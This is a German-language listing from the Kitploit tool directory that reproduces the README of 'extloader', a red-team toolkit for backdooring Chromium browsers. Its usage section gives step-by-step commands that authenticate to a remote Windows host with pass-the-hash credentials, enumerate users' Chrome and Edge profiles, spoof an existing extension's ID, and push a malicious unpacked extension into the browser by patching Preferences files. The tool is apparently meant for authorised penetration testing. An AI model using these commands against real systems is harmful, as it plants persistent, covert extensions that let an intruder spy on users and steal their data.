Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
extloader — Ein Exploitation-Toolkit für Chromium-Erweiterungen | Kitploit
Tools/GitHubGitHub/synacktiv/extloader
PersistenzmechanismenExploitationWebanwendungs-ExploitationInformationsbeschaffungPost-ExploitationPenetrationstestsRed Teaming
GitHubsynacktiv/extloader

extloader

Ein Exploitation-Toolkit für Chromium-Erweiterungen

Repository anzeigen
2627vor 11 MonatenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

extLoader

Ein kleines Toolkit zum Verwalten und Bereitstellen von entpackten Chromium-Erweiterungen.

Mehr dazu im folgenden Blogbeitrag: https://www.synacktiv.com/en/publications/the-phantom-extension-backdooring-chrome-through-uncharted-pathways

Installation

Direkte Installation (pipx)

root@kitploit:~
pipx install .
extloader --help

Verwenden Sie pipx für eine isolierte Installation, die auf Python 3.10+ abzielt.

Entwicklungseinrichtung (uv)

root@kitploit:~
uv venv
source .venv/bin/activate
uv pip install -e .

Authentifizierungsoptionen

  • Passwort: -p/--password
Tool herunterladen
  • Hash: -H/--hash (LM:NT-Format oder nur NT)
  • Domäne: -d/--domain (Standard: WORKGROUP)
  • Allgemeine Parameter

    • -t, --target: Ziel-IP/-Hostname
    • -u, --username: Benutzername
    • -i, --index: Benutzerindex aus dem check-Befehl
    • --debug: Debug-Logging aktivieren

    Verwendung

    Hier ist ein Schritt-für-Schritt-Beispiel für die Bereitstellung einer Erweiterung:

    1. Zuerst verfügbare Ziele prüfen:
    root@kitploit:~
    # This will list available users and browsers
    extloader check -t 192.168.1.100 -u admin -H aad3b435b51404eeaad3b435b51404ee:ntlm_hash -d corp.local
    
    ┏━━━━━━━━┳━━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
    ┃ Index  ┃ Browser         ┃ User (SID)                                                   ┃
    ┡━━━━━━━━╇━━━━━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┩
    │   1    │ Chrome          │ john.doe (S-1-5-21-4196007090-2879228606-3183820935-1122)    │
    │   2    │ Microsoft Edge  │ john.doe (S-1-5-21-4196007090-2879228606-3183820935-1122)    │
    └────────┴─────────────────┴──────────────────────────────────────────────────────────────┘
    

    Wenn Sie den Exploit auf einer anderen Maschine ausführen, führen Sie immer zuerst den Befehl check aus, um den Kontext (available_targets.json) zu aktualisieren.

    1. Manifest vorbereiten (Signieren oder Spoofing einer ID):
    root@kitploit:~
    # Create a deterministic crx_id by adding a key to the manifest.json
    extloader sign --extension ./my-extension
    

    Um eine vorhandene Erweiterungs-ID zu spoofen, überspringen Sie den obigen Befehl und setzen Sie den key im Manifest auf den Base64-öffentlichen Schlüssel der Erweiterung, die Sie nachahmen. Die Wiederverwendung dieses Schlüssels lässt die CRX-ID unverändert.

    1. Bereitstellen der Erweiterung:
    root@kitploit:~
    # Deploy to user index 1 (Chrome of john.doe)
    extloader exploit -t 192.168.1.100 -u admin -H ntlm_hash -i 1 --extension ./my-extension
    
    1. (Alternative) Für manuelle Bereitstellung paketieren:
    root@kitploit:~
    # Bundle the signed extension with the captured Preferences file
    extloader package --prefs-file "Preferences" --extension-dir ./my-extension --target-dir "C:\\Users\\Public"
    
    # This creates a ZIP containing:
    # - Signed extension files
    # - Updated preferences files
    # - Deployment instructions
    

    --prefs-file erwartet die Browserprofil-Präferenzen, die Sie gesichert haben (Chrome/Edge speichern sie als Secure Preferences, andere Chromium-Browser verwenden Preferences). Der Loader kopiert sie, patcht sie und fügt sowohl die modifizierte als auch die unveränderte Version in das Paket ein.

    root@kitploit:~
    ├── extension/
    │   └── chrome-mv3/
    ├── preferences/
    │   ├── brave/
    │   ├── chrome/
    │   ├── chromium/
        [...]
    └── info.json
    
    1. Original-Präferenzen bei Bedarf wiederherstellen:
    root@kitploit:~
    # Restore original preferences for user index 1 (need check command to get the correct context)
    extloader restore -t 192.168.1.100 -u admin -H ntlm_hash -i 1 -f ./backup_preferences
    

    TODO

    • Kerberos-Unterstützung
    • nxc-Modul
    • package-Workflow für Linux anpassen
    • package-Workflow für macOS anpassen